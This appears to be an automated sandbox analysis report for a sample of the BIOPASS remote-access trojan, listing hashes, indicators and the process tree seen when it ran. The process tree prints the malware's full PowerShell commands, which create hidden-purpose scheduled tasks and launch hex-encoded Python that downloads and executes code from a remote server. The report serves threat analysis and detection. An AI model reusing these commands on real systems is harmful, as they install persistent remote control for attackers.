biopass | 5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba

Analysis

max time kernel
150s
max time network
94s
platform
windows7_x64
resource
win7v20210410
submitted
12-07-2021 07:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba.exe
Size

4.8MB
MD5

15e8a6b8e6f7497ff3b858d3bad7f0c3
SHA1

f672aa3a40647f3f1c724e1e6279e09332e5df18
SHA256

5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba
SHA512

4857e5eaa32dca2159a25465bcb389568dc5376f79901dacd8bcc103be052e81cba2563721cf34409507b89939e2dc97ce11624e75408d6c01147db2e2635e5d

Score

10^/10

biopass rat trojan

Malware Config

Signatures

biopass
BIOPASS is a RAT connected with Winnti group (APT41).
rat trojan biopass

family_biopass 1 IoCs

yara_rule
family_biopass

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
616	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe

Loads dropped DLL 64 IoCs

pid	Process
980	taskeng.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
616	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe
1964	ServiceHub.Host.CLR.exe

GoLang User-Agent 2 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	5	Go-http-client/1.1
HTTP User-Agent header	6	Go-http-client/1.1

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2008	ping.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
300	powershell.exe
300	powershell.exe
1916	powershell.exe
1916	powershell.exe
1624	powershell.exe
1624	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	300	powershell.exe
Token: SeDebugPrivilege	1916	powershell.exe
Token: 35	616	ServiceHub.Host.CLR.exe
Token: SeDebugPrivilege	1624	powershell.exe
Token: 35	1964	ServiceHub.Host.CLR.exe

Suspicious use of WriteProcessMemory 39 IoCs

description	pid	Process	procid_target
PID 1268 wrote to memory of 2008	1268	5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba.exe	26
PID 1268 wrote to memory of 2008	1268	5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba.exe	26
PID 1268 wrote to memory of 2008	1268	5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba.exe	26
PID 1268 wrote to memory of 1576	1268	5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba.exe	31
PID 1268 wrote to memory of 1576	1268	5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba.exe	31
PID 1268 wrote to memory of 1576	1268	5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba.exe	31
PID 1576 wrote to memory of 300	1576	cmd.exe	33
PID 1576 wrote to memory of 300	1576	cmd.exe	33
PID 1576 wrote to memory of 300	1576	cmd.exe	33
PID 1576 wrote to memory of 876	1576	cmd.exe	34
PID 1576 wrote to memory of 876	1576	cmd.exe	34
PID 1576 wrote to memory of 876	1576	cmd.exe	34
PID 1268 wrote to memory of 1252	1268	5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba.exe	36
PID 1268 wrote to memory of 1252	1268	5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba.exe	36
PID 1268 wrote to memory of 1252	1268	5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba.exe	36
PID 980 wrote to memory of 616	980	taskeng.exe	38
PID 980 wrote to memory of 616	980	taskeng.exe	38
PID 980 wrote to memory of 616	980	taskeng.exe	38
PID 1252 wrote to memory of 1916	1252	cmd.exe	39
PID 1252 wrote to memory of 1916	1252	cmd.exe	39
PID 1252 wrote to memory of 1916	1252	cmd.exe	39
PID 1252 wrote to memory of 2000	1252	cmd.exe	40
PID 1252 wrote to memory of 2000	1252	cmd.exe	40
PID 1252 wrote to memory of 2000	1252	cmd.exe	40
PID 1252 wrote to memory of 316	1252	cmd.exe	41
PID 1252 wrote to memory of 316	1252	cmd.exe	41
PID 1252 wrote to memory of 316	1252	cmd.exe	41
PID 1268 wrote to memory of 1572	1268	5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba.exe	42
PID 1268 wrote to memory of 1572	1268	5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba.exe	42
PID 1268 wrote to memory of 1572	1268	5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba.exe	42
PID 1572 wrote to memory of 1624	1572	cmd.exe	44
PID 1572 wrote to memory of 1624	1572	cmd.exe	44
PID 1572 wrote to memory of 1624	1572	cmd.exe	44
PID 1572 wrote to memory of 2008	1572	cmd.exe	45
PID 1572 wrote to memory of 2008	1572	cmd.exe	45
PID 1572 wrote to memory of 2008	1572	cmd.exe	45
PID 980 wrote to memory of 1964	980	taskeng.exe	46
PID 980 wrote to memory of 1964	980	taskeng.exe	46
PID 980 wrote to memory of 1964	980	taskeng.exe	46

C:\Users\Admin\AppData\Local\Temp\5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba.exe
"C:\Users\Admin\AppData\Local\Temp\5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1268
- C:\Windows\system32\ping.exe
  ping www.baidu.com
  2⤵
  - Runs ping.exe
  PID:2008
- C:\Windows\system32\cmd.exe
  cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(bytes.fromhex(''696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f63313232322e7478742729292e7265616428292e6465636f6465282929'').decode())\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_SETTINGS"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(bytes.fromhex(''696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f63313232322e7478742729292e7265616428292e6465636f6465282929'').decode())\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:300
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Run /TN SYSTEM_SETTINGS
    3⤵
    PID:876
- C:\Windows\system32\cmd.exe
  cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\Silverlight.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_TEST && SCHTASKS /DELETE /F /TN SYSTEM_TEST "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1252
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\Silverlight.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1916
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Run /TN SYSTEM_TEST
    3⤵
    PID:2000
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /DELETE /F /TN SYSTEM_TEST
    3⤵
    PID:316
- C:\Windows\system32\cmd.exe
  cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(bytes.fromhex(''696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f636461656d6f6e2e7478742729292e7265616428292e6465636f6465282929'').decode())\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_CDAEMON"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1572
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(bytes.fromhex(''696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f636461656d6f6e2e7478742729292e7265616428292e6465636f6465282929'').decode())\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1624
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Run /TN SYSTEM_CDAEMON
    3⤵
    PID:2008

C:\Windows\system32\taskeng.exe
taskeng.exe {6F4DF63F-FB24-4C8A-8401-FBEE7B97D264} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:980
- C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe
  C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec(bytes.fromhex('696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f63313232322e7478742729292e7265616428292e6465636f6465282929').decode())" a a
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:616
- C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe
  C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec(bytes.fromhex('696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f636461656d6f6e2e7478742729292e7265616428292e6465636f6465282929').decode())" a a
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:1964

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/300-70-0x000000001B9E0000-0x000000001B9E1000-memory.dmp

Filesize
4KB

Download
memory/300-66-0x00000000024E0000-0x00000000024E1000-memory.dmp

Filesize
4KB

Download
memory/300-63-0x000007FEFB991000-0x000007FEFB993000-memory.dmp

Filesize
8KB

Download
memory/300-69-0x000000001AC44000-0x000000001AC46000-memory.dmp

Filesize
8KB

Download
memory/300-64-0x00000000024A0000-0x00000000024A1000-memory.dmp

Filesize
4KB

Download
memory/300-68-0x000000001AC40000-0x000000001AC42000-memory.dmp

Filesize
8KB

Download
memory/300-65-0x000000001ACC0000-0x000000001ACC1000-memory.dmp

Filesize
4KB

Download
memory/300-67-0x0000000002400000-0x0000000002401000-memory.dmp

Filesize
4KB

Download
memory/1624-156-0x000000001AB60000-0x000000001AB62000-memory.dmp

Filesize
8KB

Download
memory/1624-157-0x000000001AB64000-0x000000001AB66000-memory.dmp

Filesize
8KB

Download
memory/1916-83-0x000000001AA94000-0x000000001AA96000-memory.dmp

Filesize
8KB

Download
memory/1916-125-0x00000000023D0000-0x00000000023D1000-memory.dmp

Filesize
4KB

Download
memory/1916-82-0x000000001ACD0000-0x000000001ACD1000-memory.dmp

Filesize
4KB

Download
memory/1916-146-0x000000001C3B0000-0x000000001C3B1000-memory.dmp

Filesize
4KB

Download
memory/1916-81-0x000000001AA90000-0x000000001AA92000-memory.dmp

Filesize
8KB

Download
memory/1916-80-0x0000000001FA0000-0x0000000001FA1000-memory.dmp

Filesize
4KB

Download
memory/1916-132-0x0000000002490000-0x0000000002491000-memory.dmp

Filesize
4KB

Download